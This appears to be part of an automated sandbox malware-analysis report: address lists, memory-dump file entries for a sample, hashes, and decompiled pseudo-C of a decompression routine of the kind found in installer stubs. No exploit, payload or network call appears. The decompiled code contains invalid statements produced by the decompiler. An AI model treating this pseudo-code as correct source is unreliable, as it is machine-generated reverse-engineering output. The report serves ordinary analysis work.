                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x0040722d
                          0x00407462
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00407499
                          0x00407499
                          0x00000000
                          0x00407499
                          0x004072e6
                          0x0040726d
                          0x0040726a
                          0x00000000
                          0x00406ea1

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                          • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                          • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                          • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406FBB() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xb;
                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x28);
                          						L88:
                          						 *(__ebp - 0x2c) = __eax;
                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          						L89:
                          						__eax =  *(__ebp - 4);
                          						 *(__ebp - 0x80) = 0x15;
                          						__eax =  *(__ebp - 4) + 0xa68;
                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          						L69:
                          						 *(__ebp - 0x84) = 0x12;
                          						while(1) {
                          							L132:
                          							 *(_t613 - 0x54) = _t606;
                          							while(1) {
                          								L133:
                          								_t531 =  *_t606;
                          								_t589 = _t531 & 0x0000ffff;
                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          								if( *(_t613 - 0xc) >= _t565) {
                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          									 *(_t613 - 0x40) = 1;
                          									_t532 = _t531 - (_t531 >> 5);
                          									 *_t606 = _t532;
                          								} else {
                          									 *(_t613 - 0x10) = _t565;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          								}
                          								if( *(_t613 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t613 - 0x6c) == 0) {
                          									 *(_t613 - 0x88) = 5;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t533 =  *(_t613 - 0x84);
                          								while(1) {
                          									 *(_t613 - 0x88) = _t533;
                          									while(1) {
                          										L1:
                          										_t534 =  *(_t613 - 0x88);
                          										if(_t534 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                          											case 0:
                          												if( *(_t613 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t534 =  *( *(_t613 - 0x70));
                          												if(_t534 > 0xe1) {
                          													goto L171;
                          												}
                          												_t538 = _t534 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t570);
                          												_push(9);
                          												_pop(_t571);
                          												_t609 = _t538 / _t570;
                          												_t540 = _t538 % _t570 & 0x000000ff;
                          												asm("cdq");
                          												_t604 = _t540 % _t571 & 0x000000ff;
                          												 *(_t613 - 0x3c) = _t604;
                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          													L10:
                          													if(_t612 == 0) {
                          														L12:
                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t612 = _t612 - 1;
                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          													} while (_t612 != 0);
                          													goto L12;
                          												}
                          												if( *(_t613 - 4) != 0) {
                          													GlobalFree( *(_t613 - 4));
                          												}
                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t613 - 4) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t45 = _t613 - 0x48;
                          												 *_t45 =  *(_t613 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t613 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t546 =  *(_t613 - 0x40);
                          												if(_t546 ==  *(_t613 - 0x74)) {
                          													L20:
                          													 *(_t613 - 0x48) = 5;
                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t613 - 0x74) = _t546;
                          												if( *(_t613 - 8) != 0) {
                          													GlobalFree( *(_t613 - 8)); // executed
                          												}
                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          												 *(_t613 - 8) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          												 *(_t613 - 0x84) = 6;
                          												 *(_t613 - 0x4c) = _t553;
                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          												L132:
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												_t67 = _t613 - 0x70;
                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          												if( *(_t613 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t531 =  *_t606;
                          												_t589 = _t531 & 0x0000ffff;
                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          												if( *(_t613 - 0xc) >= _t565) {
                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          													 *(_t613 - 0x40) = 1;
                          													_t532 = _t531 - (_t531 >> 5);
                          													 *_t606 = _t532;
                          												} else {
                          													 *(_t613 - 0x10) = _t565;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          												}
                          												if( *(_t613 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												__eflags =  *(__ebp - 0x40) - 1;
                          												if( *(__ebp - 0x40) != 1) {
                          													__eax =  *(__ebp - 0x24);
                          													 *(__ebp - 0x80) = 0x16;
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x28);
                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          													__eax =  *(__ebp - 0x2c);
                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          													__eax = 0;
                          													__eflags =  *(__ebp - 0x38) - 7;
                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          													__al = __al & 0x000000fd;
                          													__eax = (__eflags >= 0) - 1 + 0xa;
                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x664;
                          													__eflags = __eax;
                          													 *(__ebp - 0x58) = __eax;
                          													goto L69;
                          												}
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 8;
                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t259;
                          												0 | _t259 = _t259 + _t259 + 9;
                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          												goto L76;
                          											case 0xa:
                          												goto L0;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												goto L69;
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
